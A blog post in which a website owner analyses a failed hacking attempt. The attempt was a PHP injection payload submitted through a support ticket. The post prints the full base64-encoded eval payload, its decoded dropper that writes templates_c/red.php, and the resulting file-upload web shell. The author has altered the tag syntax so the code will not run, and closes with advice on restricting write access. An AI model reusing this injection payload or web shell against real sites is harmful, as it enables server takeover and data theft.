loader gif

When they hacked my website

So….The other day someone tried to hack one of my websites – not this one, another one – which shall remain nameless in case it is seen as some kind of challenge(!). As it happens I’m up on these things, particularly on the website in question so my installation was very secure – I had followed all the necessary security measures and the hacking attempt was unsuccessful. So what did they do?

Well actually, they raised a support ticket with a PHP injection script. What’s one of those? It’s one of these:

 {php#}eval(base64_decode('JGMzbyA9IGJhc2U2NF9kZWNvZGUoIlBEOXdhSEFOQ21WamFHOGdKenhtYjNKdElHRmpkR2x2YmowaUlpQnRaWFJvYjJROUluQnZjM1FpSUdWdVkzUjVjR1U5SW0xMWJIUnBjR0Z5ZEM5bWIzSnRMV1JoZEdFaUlHNWhiV1U5SW5Wd2JHOWhaR1Z5SWlCcFpEMGlkWEJzYjJGa1pYSWlQaWM3RFFwbFkyaHZJQ2M4YVc1d2RYUWdkSGx3WlQwaVptbHNaU0lnYm1GdFpUMGlabWxzWlNJZ2MybDZaVDBpTlRBaVBqeHBibkIxZENCdVlXMWxQU0pmZFhCc0lpQjBlWEJsUFNKemRXSnRhWFFpSUdsa1BTSmZkWEJzSWlCMllXeDFaVDBpVlhCc2IyRmtJajQ4TDJadmNtMCtKenNOQ21sbUtDQWtYMUJQVTFSYkoxOTFjR3duWFNBOVBTQWlWWEJzYjJGa0lpQXBJSHNOQ2dscFppaEFZMjl3ZVNna1gwWkpURVZUV3lkbWFXeGxKMTFiSjNSdGNGOXVZVzFsSjEwc0lDUmZSa2xNUlZOYkoyWnBiR1VuWFZzbmJtRnRaU2RkS1NrZ2V5QmxZMmh2SUNjOFlqNVZjR3h2WVdRZ1UxVkxVMFZUSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNnbGxiSE5sSUhzZ1pXTm9ieUFuUEdJK1ZYQnNiMkZrSUVkQlIwRk1JQ0VoSVR3dllqNDhZbkkrUEdKeVBpYzdJSDBOQ24wTkNqOCsiKTsNCiRyZWQgPSBmb3BlbigidGVtcGxhdGVzX2MvcmVkLnBocCIsInciKTsNCmZ3cml0ZSgkcmVkLCRjM28pOw=='));{/php#} 

Its very simple. It asks for the server to invoke the php interpreter (although I’ve hadded hashes in to prevent it from running anything untoward), and decode the (apparently gobbledy-gook) string.

It’s not gobbledy-gook of course, just encrypted with Base64 encoding to prevent natural language interpretation.

This first step failed miserably, but I thought it would be a good idea to run through the script and find out what would have happened if it had worked. So I decoded the string – and it comes out as a little more code and still more gobbledy-gook. like this:

 $c3o = base64_decode("PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCglpZihAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICc8Yj5VcGxvYWQgU1VLU0VTICEhITwvYj48YnI+PGJyPic7IH0NCgllbHNlIHsgZWNobyAnPGI+VXBsb2FkIEdBR0FMICEhITwvYj48YnI+PGJyPic7IH0NCn0NCj8+"); $red = fopen("templates_c/red.php","w"); fwrite($red,$c3o); 

 

Now we can begin to see what it will do. It sets a string variable ($c3o) to another decoded string, and tries to write it to the file system in “templates_c/red.php”. Now this never took place, but if it did, they would have been able to invoke the decoded string by running www.thewebsitetheytriedtohack.com/templates_c/red.php. So what would have happened if they had done that? Well, decoding that last little gobbledy-gook string gives us a natty little form:

 <#php echo '

<form id="uploader" action="" method="post" name="uploader" enctype="multipart/form-data">'; echo '
<input type="file" name="file" size="50" /> <input id="_upl" type="submit" name="_upl" value="Upload" /> </form>'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<strong>Upload SUKSES !!!</strong>

 
<div>'; } else { echo '<strong>Upload GAGAL !!!</strong>'; } } #> 

Basically it gives you a button to upload a file to the server. IF it works it tells you “Upload SUKSES !!!”, if it fails, it tells you “Upload GAGAL !!!”. That would allow a human user to navigate to the form, and upload anything they liked and run it on my webserver, which might be a spambot, or simple a PHP database query to steal information, all manner of possiblities.

 

But if nothing else – this post should demonstrate the importance of getting your folder and directory access secure and LOCKED DOWN.

 

Write access should be disabled unless it’s essential. Fascinating how our (malay, I believe) hacking compardre’s start their works!!!!